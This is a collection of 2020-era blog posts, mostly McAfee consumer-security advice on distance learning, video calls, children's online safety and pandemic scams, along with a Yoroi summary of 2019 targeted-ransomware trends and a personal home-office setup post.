Take the time to secure your devices and home network with unique, complex passwords. Many users, including students, utilize the same password, or variations of it, across all their accounts. This means if a hacker discovers just one password, all personal data is suddenly at risk. Therefore, it is crucial to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials.  

Enable Two-Factor or Multi-Factor Authentication

Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers. 

Stay Educated on Security Precautions

As you adapt to learning from home, you’ll likely consider downloading various online tools to help make the transition easier. Before downloading the first tools you see, do your research and check for possible security vulnerabilities or known threats 

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

 

The post How to Stay Secure While Distance Learning: Don’t Get Schooled by Hackers appeared first on McAfee Blogs.

Cybersecurity Trends

Trends are interesting since they could tell you where things are going.

I do believe in studying history and behaviors in order to figure out where things are going on, so that every Year my colleagues from Yoroi and I spend several weeks to study and to write what we observed during the past months writing the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

The Rise of Targeted Ransomware

2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or in the malware code spread all over the Internet to compromise Companies assets and data but in the evolution and the consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by States Sponsored actors, Cyber-Criminals and Hack-tivists, each one having some kind of attributes, both in motivations, objectives, methods and sophistications.

During the 2019 we observed a rapid evolution of Cyber Crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. But actors are also involved in cyber-espionage, CEO frauds, credential stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but traditionally much more active in the so called “opportunistic” cyber attacks. Attacks opportunistically directed to all the internet population, such as botnets and crypto-miners infection waves, but also involved in regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagations waves.
In 2019 like what happened in 2018, Ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase in o the Ransomware phenomenon, both in term of newborn ransomware families and also in the ransom payment options, driven by the consolidation of the digital cryptocurrencies market that made the traditional tracking techniques – operated by law enforcement agencies – l less effective due to new untrackable crypto currencies. But these increasing volumes weren’t the most worrying aspect we noticed.

Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open up an attachment, most of the times an Office Document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators, moved into this emerging sector leveraging their infection capabilities, their long term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow up ransomware within infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

Many major cyber criminal groups developed a sort of malicious “RedTeam” units, lest call them “DarkTeams”. These units are able to manually engage high value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they are also using industry specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
Actually, this kind of behaviour is not new to us. Such methods of operations have been used for a long time, but not by such a large number of actors and not with such kind of objectives. Network penetration was in fact a peculiarity of state sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referenced as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
During 2019, we observed a strong game change in the ransomware attacks panorama.

The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high impact business attacks modeled to be very effective for the victim context. We are facing the evolution of ransomware by introducing Targeted Ransomware Attacks.

We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operation of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they only were the tip of the iceberg. Many other criminal groups have consolidated this kind of operations such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shame of their victims. Maze was one of the first actors pionering this practice in 2019: the group started to disclose the name of the private companies they hacked into along with pieces of internal data stolen during the network intrusions.

The problem rises when the stolen data includes Intellectual Property and Personal Identifiable Information. In such a case the attacker leaves the victim organization with an additional, infaust position during the cyber-crisis: handling of the data breach and the fines disposed by the Data Protection Authorities. During 2020 we expect these kinds of practices will be more and more common into the criminal criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy leveraging services like Yoroi’s Cyber Security Defence Center could be crucial to equip the Company with proper technology to acquire visibility on targeted ransomware attacks, knowledge, skills and processes to spot and handle these kind of new class of threats.

Zero-Day Malware

Well Known threats are always easier to be recognized and managed since components and intents are very often clear. For example a Ransomware, as known today, performs some standard operations such as (but not limited to): reading file, encrypting file and writing back that file. An early discovery of known threat families would help analysts to perform quick and precise analyses, while unknown threats are always difficult to manage since analysts would need to discover firstly the intentions and then bring back behaviour to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform trying to attribute them to known threats.

As part of the automatic analysis pipeline, Yoroi’s technology reports if the malicious files are potentially detected by Anti-Virus technologies during the detection time. This specific analogy is mainly done to figure-out if the incoming threat would be able to bypass perimetral and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words we are able to see if a Malware belonging to a

threat actor or related to specific operation (or incident) is detected by AV, Firewall, Next Generation X and used endpoints.
In this context, we shall define what we mean for Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of arbitrary malware families. The following image (Fig:1) shows how most of the analyzed Malware is unknown from the InfoSec community and from common Antivirus vendors. This finding supports the even evolving Malware panorama in where attackers start from a shared code base but modify it depending on their needed to be stealth.

Immagine che contiene dispositivo, disegnando

Descrizione generata automaticamente

The reported data are collected during the first propagation of the malicious files across organizations. It means Companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases where the attack becomes stealth for hours or even for days.
Along with the Zero-Day malware observation, most of the known malware at time of delivery have not so high chances of being blocked by security controls. The 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even the so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed only less than 20% of analyzed samples belonging to “not Zero-Day” are detected by more than 15 AV engines.

Drilling down and observing the behavioural classification of the intercepted samples known by less than 5 AntiVirus engines at detection time, we might appreciate that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or component) lead the way with 54% of cases, slightly decreasing since the 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% of 2018 to the current 2%, and the bullish raise of “Trojan” behaviours up to 35% of times, more than doubled respect to the 15% of 2018.
This trend endorses the evidence that ransomware attacks in 2019 begun to follow a targeted approach as described in the “The Rise of Targeted Ransomware” section.

Immagine che contiene dispositivo

Descrizione generata automaticamente

A reasonable interpretation of the darkling changes on these data, could actually conform with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, many of the delivered malware are actually a single part of a more complex infection chain. A chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.   

This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to Info.Sec. community – at the time of delivery –  substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan raised from 28% to 52% of cases, showing similar macro variations.

Immagine che contiene dispositivo

Descrizione generata automaticamente

If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

Working From Home: Building Your Own Setup

This is the fifth week my company (Yoroi) and I are working from home (covid-19). While every company process is running smooth and fast, personal quarantine is getting quite long and heavy especially if you are accustom to travel a lot for working purposes. Under these circumstances home office setup becomes very important as you should be comfortable in delivering as much as you did while sitting in your perfectly fitting office. Moreover during the past few weeks I received many emails and private messages from people like me asking about personal suggestions on home setup. So I decided to write up a little blog post on my personal suggestions about home setup for remote workers.

First: What you do.

My personal home desk changed a lot during the years. On one hand new technology became available but on the other hand (and mostly important) my role and interests changed a lot over time. I started with a super-nerd home setup while I was in college, including soldering irons, desoldering air heater, Arduino boards all over the shelves, Raspberry with many cover flavors, three monitors one of them vertical oriented (for reading documentation), black screen and mechanical keyboards. This environment was fitting my needs in that specific time, but it would not fit my current needs. The first thing that you should do in refactoring your own home desk is to understand what you do. Not what you would like to do, but rather what you do. Before starting surfing on gadget websites, just focus on what you are doing on daily basis. A developer and a Malware analysts share few needs but their environments wont be closed each other. If you are a CXX your environment will look definitely different respect to your IT-Manager !

Second: Less is more.

I know many of you wont agree with this paragraph but in my personal point of view: “less is more” (cit. Mies). As many objects populate your desk as higher is the probability to get distracted from them. I tended to have books on my desks, and every time I watched them I took my mind to that story or to what the book gave me in term of knowledge and.. this was really distracting me. 6 things are my minimal and best setup. A Laptop, a Mouse, a Mechy keyboard, headphones, a big monitor and my phone.

Home SetUP

Monitor

Talking about monitor I would suggest a single big one. I used to have multiple monitors on my desk and it is amazing to see how many parallel tasks you would keep on them, but many parallel tasks does not necessary mean higher productivity. In my experience I noticed that it’s best to focus on 3 or 4 parallel tasks not more. So a big screen managed by a great window managed (see software section) would help you in not exaggerate on multiple tasks. However if you are a developer an additional vertical screen would definitely help you in consulting StackOverflow, GitHub and Documentations. In many other cases, I personally wont suggest more than two displays. My favorite size is 27″ and I do prefer “border less” monitor with adjustable “neck” in order to move it depending on chair position. Actually one of my favorite is SAMSUNG SR75 4K UHD Space Monitor, it is Ultra HD, great looking and very minimal in space, so you would have much more space for your arms.

Keyboard

Mechanical keyboard is a little pleasure of life. If you are a writer it is definitely a “mush have” while if you are a developer or a malware analyst it’s mostly a fashion. Contrary if you are a penetration tester or a adversarial simulator you would probably appreciate more foldable keyboards or if you are in IT guy you would probably love small and tiny keyboards light and easy to carry between racks on “work in progress” data-centers. Like in monitor ecosystem keyboard is a humongous world where there is not a “best in class” ever, there is what “you like most”. In my case I do love Varmilo keyboards since they allow many quite interesting customizations. Ergonomic plays a fundamental role in keyword choice, but even the most ergonomic keyboards could harm you if you have not a good body posture, so before getting into a very fancy ergonomic keyboard (like the most famous one HERE) try to correct your body posture.

Mouse

Mouse is one of the most used artifact that you will be touching since you sit on your comfortable chair, so you need to put the right attention on what you choose. While Kensington trackball mouse (here) is definitely my personal suggestion, I do not use it. Since I used to travel a lot during my normal working weeks I can’t carry it back and forth from travels. It’s a trackball is not comfortable to be moved at all. So I decided to take a small but yet nice mouse. If you are used to travel a lot like me, you would probably appreciate a Bluetooth mouse with no cables on the bag (remember less is more). The mouse should be small in size and light. I would suggest having a hard (metal) and mechanical wheel with strong inertia in order to give you back a nice scrolling feeling. One of my favorite is definitely the Logitech MX everywhere 2.

Computer

This would be the most important choice, indeed it could be quite easy to change monitor or a mouse, but chaining your PC it would be much more challenging (and expensive). Depending on what you are doing on your daily basis you would have many many choices. So let’s start from the mobility. In my case I move a lot between my offices and where I go I used to have external monitors, so I prefer small laptops. My principal tasks are between malware analysis (most for fun) and management (most for work), so I need many virtual machines (most for fun) and many chrome tabs (most for work). High performances in terms of SSD, CPU and RAM are required (virtualization and Malware analysis tool sets) . If you are a podcaster or a youtuber your would need an high performance graphic processor (especially if you post-process video) , if you are a writer you would probably love to write “around the globe” (not in a small cold office) so you would love a light laptop or if you are a developer or content designer you would probably love a MAC 😀 (just kidding you). My favorite so far is the RazerBlade Stealth 13″ which has incredible performances. Touchscreen monitor and retina display, beyond i7, 16GB ram and 500GB SSD. Generally speaking if you are looking for a PC and not for a MAC I would definitely suggest to take a look to one of the following tiny little but powerful laptops such as: Dell XPS 13, HP Spectre and ASUS ZenBook.

Headphones

If you are a music lover, well you’d better jump this section. I don’t use headphones for high quality music listening but rather for conferences and calls. However from time to time I love focusing by listening my favorite playlist so I had to figure-out what, in my personal point of view, could be a good arrangement. My best compromise was Jabra Move. If you don’t need music (or if you have a separate headphones for listening to music) having two “covered” ears (in term of stereo) could be quite annoying since it’s not so natural talking without having the right feel of your natural voice (with stereo headphone your voice is quite muffled). On the other hand if you want to listen to the music, definitely you cannot do with a mono headphone. Jabra Move looks like having a nice sound quality and nice integrated microphone, so that you could easily switch between conferences and music without changing hardware.

Software

First of all let me explain why I am crazy about window managers. When you get into the productivity world, having a well-configured system with personal shortcuts is not only a way to speedup the boring tasks (open windows, resize windows, create multi-desktop environments, open up the usual web pages for reading, download stuff and place it on the right folder, saving bookmarks, etc etc) it is actually a way to organize your entire day. As many patterns are available for eMail management (I do prefer the zero-inbox pattern, even if I don’t truly succeed in using it) many are available for virtual desktop management. While I was used to manage virtual desktop by functionality (and this works pretty well on MAC OS systems) on a my Linux box I prefer keeping virtual desktops by projects. So yes, I do have many duplicated applications running but specialized on a specific topic. Questionable, I know… but in this way I feel much more confident since I prefer to classify my work into projects rather than on functionalities over multiple virtual environments. Anyway, a great window management would definitely help you out. I’ve always been fascinated in using i3 tiling windows manger but I was always skeptical in the startup phase: on one hand the time to become fluent in i3 and on the other hand the installation procedure and configuration time was kind killing me. But recently I met regolith which change my way to thing window managers. Today I definitely would suggest you to try it at least for one week.

While a lot of ToDo-list software are available out there, I do prefer the simple Todo.txt. It is damn simple, you can access it from multiple devices, it has a command line, it could manage priorities and… it has a command line !! (did I already mentioned ). If you are a more “web oriented” guy, I would suggest you Trello-CLI, but really not more than that.

One of my favorite editor is VIM. But I am not an “old school guy”, I just love the many many plugin available for it and how you can transform it !

VIM Configuration

Once you’ve learned to dominate VIM you don’t need any editor ever, VIM is everywhere and you might customize it in a very quick and fast way. If you like how my VIM looks like HERE my configuration file, feel free to grab and use it if you wish.

Conclusion

I don’t think there would be a definitive setup. It will change over time depending on your needs. You might need electronic boards and soldering irons or a simple laptop at all. It really depends on what you are doing and what are the deliverables you are working on. In this “unusual” (at least for my corner) post I wanted to answer to many questions on the “perfect home setup” that came to me in the past three weeks. Actually I have my “perfect” setup which I’ve shared with you, but I am sure it will change over and over again even if it has changed a lot in the past few years. The only real suggestion that I’d like to appoint is: “Less is More”. Few things you hold on your desk few distraction-points you would have and faster would be your deliverable.

Have fun and #StayAtHome

How Secure Is Video Conferencing?

As millions of people around the world practice social distancing and work their office jobs from home, video conferencing has quickly become the new norm. Whether you’re attending regular work meetings, partaking in a virtual happy hour with friends, or catching up with extended family across the globe, video conferencing is a convenient alternative to many of the activities we can no longer do in real life. But as the rapid adoption of video conferencing tools and apps occurs, is security falling by the wayside?  

Avoid Virtual Party Crashers

One security vulnerability that has recently made headlines is the ability for uninvited attendees to bombard users’ virtual meetings. How? According to Forbes, many users have posted their meeting invite links on social media sites like Twitter. An attacker can simply click on one of these links and interrupt an important conference call or meeting with inappropriate content.  

Ensure Data is in the Right Hands

Online conferencing tools allow users to hold virtual meetings and share files via chat. But according to Security Boulevard, communicating confidential business information quickly and privately can be challenging with these tools. For example, users are not always immediately available, even when working from home. In fact, many parents are simultaneously doubling as working parents and teachers with the recent closure of schools and childcare providers. If a user needs to share private information with a coworker but they are unable to connect by video or phone, they might revert to using a messaging platform that lacks end-to-end encryptiona feature that prevents third-party recipients from seeing private messages. This could lead to leaks or unintended sharing of confidential data, whether personal or corporate. What’s more, the lack of using a secure messaging platform could present a hacker with an opportunity to breach a victim’s data or deviceDepending on the severity of this type of breach, a victim could be at risk of identity theft 

Pay Attention to Privacy Policies

With the recent surge of new video conferencing users, privacy policies have been placed under a microscope. According to WIRED, some online conferencing tools have had to update their policies to reflect the collection of user information and meeting content used for advertising or other marketing efforts. Another privacy concern was brought to light by a video conferencing tool’s attention-tracking feature. This alerts the virtual meeting host when an attendee hasn’t had the meeting window in their device foreground for 30 seconds, resulting in users feeling that their privacy has been compromised.  

How to Secure Video Conferences

As users become accustomed to working from home, video conferencing tools will continue to become a necessary avenue for virtual communication. But how can users do so while putting their online security first? Follow these tips to help ensure that your virtual meetings are safeguarded:  

Do your research

There are plenty of video conferencing tools available online. Before downloading the first one you see, do your research and check for possible security vulnerabilities around the tools. Does the video conferencing tool you’re considering use end-to-end encryption? This ensures that only meeting participants have the ability to decrypt secure meeting content. Additionally, be sure to read the privacy policies listed by the video conferencing programs to find the one that is the most secure and fits your needs.  

Make your meetings password protected

To ensure that only invited attendees can access your meeting, make sure they are password protected. For maximum safety, activate passwords for new meetings, instant meetings, personal meetings, and people joining by phone. 

Block users from taking control of the screen

To keep users (either welcome or unwelcome) from taking control of your screen while you’re video conferencing, select the option to block everyone except the host (you) from screen sharing.  

Turn on automatic updates

By turning on automatic updates, you are guaranteed to have all the latest security patches and enhancements for your video conferencing tool as soon as they become available.  

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post How Secure Is Video Conferencing? appeared first on McAfee Blogs.

Internet Safety for Kids: A Refresher for Homebound Families

internet safety for kids

Editor’s Note: This is part II of our internet safety for kids series. Part I focuses on younger children and can be read here.

Parents have always been concerned about keeping their kids safe online — especially their tweens and teens. That conversation is even more critical with parents and kids now working and learning at home. But as the days turn into weeks, the line between safe and risky digital behavior may get a little blurry. Maybe we can help by refreshing some basics.

Why is internet safety for kids important?

There’s no way around it. Young and old, over time, we’ve tethered nearly every aspect of our lives to the digital realm. If we want to work, bank, shop, pay bills, or connect with family and friends, we have to plugin. A wired life makes internet safety not just important, but mission-critical for parents.

Kids go online for school, to be entertained, and to connect with friends; only they don’t have the emotional maturity or critical thinking skills to process everything they will encounter on the other side of their screens.

That’s where proactive digital parenting comes in.

If our parenting goal is to raise wise, responsible, caring adults, equipped for real life, that goal must also include helping them safeguard their emotional and physical health from online risk. There’s no such thing as a digital platform or product that is 100% safe. So, our best strategy is to learn and pass on skills that mitigate that risk.

What are the dangers of the internet?

Any danger that exists offline is potentially multiplied when we log online due to the vast access the web affords each one of us. In a few clicks, we can unlock a world of possibilities. The flip side? There’s an ever-present battalion of crooks and bullies out to exploit that access. Online we will encounter the best and the worst of humankind. The daily threats to children include bullying, inappropriate content, predators, and the loss of privacy. Add to that list, digital viruses and malware, phishing scams, sharing regrettable content, and gaming addiction.

How can homebound kids avoid digital risk?

So what can we do to ensure the weeks ahead don’t bring more digital risk into our homes? We start by having consistent, candid conversations with our kids about online safety (even if eye-rolling begins). Truth: Your family’s cybersecurity is as strong as the weakest security link in your family. If one family member is lax about internet safety, your entire family’s security is compromised.

So let’s get started with some internet safety basics to share with your tweens and teens. To read internet safety guidelines for younger children, click here.

11 Internet Safety Basics for Homebound Teens

internet safety for kids

  1. Get candid about content. Your tweens and teens have likely come across inappropriate material online. You can minimize further exposure by discussing expectations and family values around acceptable content — both sharing it and receiving it. Reminder: “Vanishing” Snapchats and deleted content can be easily captured in a screenshot — nothing shared online is private. For extra monitoring muscle, consider adding a parental control software to your family’s internet safety plan.
  2. Keep passwords, software, apps updated. Being homebound gives us all extra time for details. Go through personal and family devices and update all passwords. Keeping device software and apps updated also protects kids from outside risk.
  3. Balance life and tech. Kids can lose their entire day surfing, scrolling, and watching YouTube or TikTok videos. Establish screen limits help kids grow healthy tech habits. Consider scheduling device breaks, no phone zones (dinner table, movie time, bedtime), and installing software that features time limits.
  4. Be a leader online. Yoda was on target — with much power comes much responsibility. Many online dangers can be diminished by consistently teaching kids to be upstanders online. Practicing empathy, respect, tolerance, and compassion makes the digital world safer for everyone.
  5. Address peer pressure. Kids with devices can share unwise, personal photos with friends they trust. When friendships end, however, those photos can be shared or used for bullying or extortion. Discuss digital peer pressure with your child and how to respond.
  6. Look out for scams. Talk frequently about the many forms scams can take, such as phishing, malware, catfishing, fake news, and clickbait.
  7. Don’t friend strangers. Sexual predators create fake social media accounts specifically to befriend kids. In turn, kids share personal info, daily plans, location, and may even agree to meet in person with online friends. Discuss these risky scenarios and other manipulation tactics of predators with your child. Be aware of his or her friend circles, and look for chat apps such as WhatsApp or Kik.
  8. Maximize privacy on social profiles. Help kids maximize privacy settings on social profiles and delete any profile or post information that unintentionally gives away personal data. Consider removing the names of family members, pets, school, hometown, and birthdays. Hackers can piece together this information to crack passwords or create authentic-looking phishing scams.
  9. Consider a family VPN. Virtual Private Networks are becoming the most popular way to conduct business, shop, and safeguard a family’s online activity from outsiders. VPN encryption can protect a child against several virtual threats.
  10. Review gaming safety. If your kids spend a lot of time on games like Fortnite and Call of Duty, they can encounter strangers, bullying, and scams that target gamers. Teen gamers should use a firewall to help block would-be attackers from gaining access to their PC and home networks and as well as a comprehensive security solution to protect devices from malware and other threats.
  11. Monitor devices. Consider spot-checking all devices routinely. Review privacy settings on social networks (kids change them), look for new apps, review browsing history, chats, and texts. Need to go a step farther? Keep your child’s phone for a few hours to check notifications that pop up. You may find activity that wasn’t necessarily visible otherwise.

Taming all the moving parts of internet safety isn’t easy, and balancing your relationship with your child and parental monitoring can get turbulent at times. While kids can experience more drama and anxiety by going online, social networks remain critical channels for affirmation, self-expression, and connection. In the weeks to come, take time to listen, learn, and get to know your child’s digital passions and patterns. Identify safety gaps and reinforce those areas. Good luck, parents, you’ve got this!

The post Internet Safety for Kids: A Refresher for Homebound Families appeared first on McAfee Blogs.

Little Ones Online More? Here Are 10 Basics To Keep Them Safe

protecting kids online

Online safety conversations look dramatically different depending on the age and stage of your child. For very young children, toddlers through elementary school, parents have a golden opportunity to lay the foundations that will shape a child’s digital perspectives and behaviors for a lifetime.

One way to keep younger children safe online is simply to begin. How early, you might ask? From the day they arrive. If you’ve ever seen a four-month-old reach for mommy’s smartphone only to cry when mommy takes it away, it’s clear the baby has observed the culture around him. He knows that the shiny toy that hums is one of mommy’s favorite things. It has the power to capture and hold her attention. It makes her laugh, cry, and influence her routine and emotions.

Protecting kids online

Modeling balanced screen habits is a powerful way to influence behavior as toddlers begin to discover television, apps, interactive toys, and online learning sites. At this stage, intentional steps such as limiting screen time, reviewing content, and talking with your little one in simple concepts about the images and stories encounter will help grow their digital IQs. Note: The American Academy of Pediatrics (AAP) recommends keeping all screens turned off around babies and toddlers younger than 24 months.

Move With The Curve

As kids move into elementary school, technology is often part of the learning experience. Some children (depending on the household) may even own smartphones. Because the integration of technology begins to increase, this stage requires parents to move with the curve of a child’s online safety needs. Priorities: Securing devices kids take to school, setting filters on web browsers, limiting screen and gaming time, encouraging physical activity and hobbies, and having consistent, age-appropriate conversations about the online world is more important than ever.

10 Online Safety Basics for Younger Children

  1. Keep devices in a common area. By locating all computers, TVs, and devices in a common area, parents can easily monitor a child’s online activity. This simple step also helps kids get used to parental monitoring and responsible digital behavior.
  2. Follow family device rules. Establish family ground rules for technology use and repeat them to your younger children. Every child’s maturity and self-control level is different. If you think your child’s connection with his or her technology begins to tip toward the unhealthy, make adjustments as you go. If you set a 20-minute game time limit, be ready to enforce it consistently. In our experience, inconsistency in enforcing technology rules when kids are young is one of the biggest regrets among parents of teens.
  3. Introduce password security. As we accumulate IoT devices, it’s common for younger children to interact with home assistants, SmartTVs, digital toys, and online games. When password prompts come up on a login screen, explain to your child what you are doing (use your password) and why passwords are necessary. Get into the habit of using 2-factor authentication for passwords and locking your device home screens with a pin code.
  4. Filter content. Younger kids accept content at face value and don’t have the critical thinking skills process information or to be alone online. If you allow younger kids online, consider sitting with them, and explaining the content in front of them. To avoid the chance of your child encountering inappropriate content by mistake, consider adding parental control software to family devices.protecting kids online
  5. Start the privacy conversation. Kids of all ages understand the word “mine.” As your kids interact with the online in the early years, explain why it’s essential to keep their name, picture, family member names, school name, and address private.
  6. Introduce VPN use early. Browsing on a secure network (VPN, Virtual Private Network) from an early age reinforces the concept of privacy online. Explain to your child how the private encryption “tunnel” your content (searches, activity, messages) passes through and how that keeps other people from grabbing your private information. Even a text conversation with Grandma could accidentally give away information.
  7. Explain the concept of scams. When age-appropriate, explain how (and why) some people online try to trick you into clicking a box or a link to learn more about you. Discuss why you shouldn’t click on pop-up ads, hyperlinks, and messages that could contain malware or phishing links. To guard family devices against malicious links, consider free tools like Web Advisor.
  8. Discuss digital stranger danger. When you open a web browser, you open your home to content and people you don’t know. Children of any age can inadvertently run into digital danger zones. Teach young children not to talk to a stranger online or send (or share) photos with others. It’s also a good idea to cover the camera lens on your laptop or tablet, advise children to never stay on a website you would not approve of, and to never download or click a link without asking your permission.
  9. Introduce safe social networking. Online communities are here to stay, so consider starting social network safety talks early. Several kid-friendly browsers, apps, and social networks exist online for younger kids and are perfect for teaching them about privacy settings, how to collaborate and interact with others online.
  10. Start talking. Keep talking. Of all the principles we’ve featured, we’ve saved the best for last. Creating an open, trusting dialogue with your child is your #1 security tool in keeping your child safe online today and into the future.

While schools introduce kids to internet safety basics to protect kids online and do well to refresh concepts along the way, it’s the consistent, intentional work of parents that shape the values and skills a child needs to navigate the online world. By putting some of these foundational principles in place early and committing to consistent follow-through, it’s possible to maintain critical influence as your children move into different phases of their digital lives.

The post Little Ones Online More? Here Are 10 Basics To Keep Them Safe appeared first on McAfee Blogs.

Scams Facing Consumers in the New Digital WFH Landscape

With many people having their normal day to day life turned upside down, scammers are capitalizing on consumers’ newfound lifestyles to make a financial gain or wreak havoc on users’ devicesLet’s take a look at the most recent threats that have emerged as a result of the pandemic 

Fraudulent Relief Checks

On Wednesday March 25, the Senate passed a relief bill that contains a substantial increase in unemployment benefits for Americans who have lost their jobs or have been furloughed due to the economic fallout from the pandemicFinancial scammers are likely to use this as an opportunity to steal money offered to Americans who are facing the negative economic effects of the pandemic, as these crooks could make consumers believe they need to pay money as a condition of receiving government relief. The Federal Trade Commission issued a warning to consumers to be on the lookout for fraudulent activity as the government implements these financial relief packages.  

Map Used to Track Pandemic Used to Spread Malware

According to security researcher Brian Krebs, criminals have started disseminating real-time, accurate information about global infection rates to spread malware. In one scheme, an interactive dashboard created by Johns Hopkins University is being used in malicious websites (and possibly in spam emails) to spread password-stealing malware.  Additionally, Krebs flagged a digital pandemic infection kit, which allows other criminals to purchase a bundled version of the map with the scammer’s preferred attack method. 

Texts, WhatsApp, and TikTok Spread Falsehoods

Due to the nature of the rapidly evolving pandemic, criminals are taking advantage of the situation by spreading misinformation. As more communities are being ordered to shelter in placemisleading text messages announcing a national quarantine claiming to come from the White House buzzed onto cell phones around the U.S. According to the Washington Post, the fraudulent text messages encouraged users to, “Stock up on whatever you guys need to make sure you have a two-week supply of everything. Please forward to your network.” These fake texts spread so widely that the White House’s National Security Council debunked the misleading claims in a Twitter post stating, “Text message rumors of a national #quarantine are FAKE. There is no national lockdown.” Communication apps like WhatsApp and social media platforms like TikTok have carried similar examples of this misinformation.  

Robocalls Offering Free Test Kits and Low-Cost Health Insurance

On top of fraudulent messages floating around via SMS, WhatsApp, and TikTok, scammers are also using robocalls to spread misinformation around the global pandemic, especially as more users are at home and available to answer phone calls as a result of self-isolation. According to CNNrobocalls from more than 60 different phone numbers are falsely offering low-priced health insurance and free coronavirus test kitsAnother type of robocall asks users to sign a petition to ban flights from China. Criminals are taking advantage of the fact that new information around the pandemic is constantly being released, presenting them with an opportunity to scam users by impersonating local and federal officials.  

Stay Safe Online With These Tips

During this time of uncertainty, it can be difficult to decipher what is fact from fiction. When it comes to the potential online threats around the recent pandemic, here’s what you can do to stay protected:  

Only trust official news sources

Be sure to only trust reputable news sites. This will help you filter out fake information that is just adding to the noise across the internet.  

Don’t share your personal or financial data

Although financial relief checks are not yet a reality, know that the federal government will not ask you to pay fees or charges upfront to receive these funds. Additionally, the government will not ask you for your Social Security number, bank account, or credit card number.  

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.  

Go directly to the source

If you receive information regarding the pandemic from an unknown user, go directly to the source instead of clicking on links within messages or attachments. For example, users should only trust the map tracking the pandemic’s spread found on the Johns Hopkins websiteUsing a tool like McAfee WebAdvisor can help users stay safe from similar threats while searching the web.  

Register for the FCC’s “Do Not Call” list

This can help keep you protected from scammers looking to capitalize on current events by keeping your number off their lists. 

Stay updated 

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Scams Facing Consumers in the New Digital WFH Landscape appeared first on McAfee Blogs.

Honey, We’re Home! Securing Your Devices and Your Family Bond  

family device security

More and more parents and their kids are experiencing what it’s like to work and learn together from home these days. With this increase in device use, it’s more important than ever to verify that all the technology humming under your roof is as secure as possible.

Securing family technology

Run an overall security check. Taking an inventory of all your family’s connected devices and their security should be as important as keeping your doors locked and keeping batteries in your smoke alarms — your family’s safety depends on it. Consider installing a comprehensive security solution across all devices. This will help protect your family against malware, viruses, phishing attacks, and alert you to malicious websites. As part of your security check, be sure to update the software on all devices, including IoT products, TVs, and toys.

Review parental controls. There’s no way around it. Device use will likely skyrocket under your roof for a while. Kids will be online for school, as well as for fun. You may have turned on some filtering on some devices and some social networks, but it may be time to bring on an extra set of eyes and ears with comprehensive filtering software. With increased tech use, parental controls will help monitor your child’s digital activity. Too, with a new work-at-home lifestyle, the software (with time limits) can also make scheduling family breaks together much more manageable.

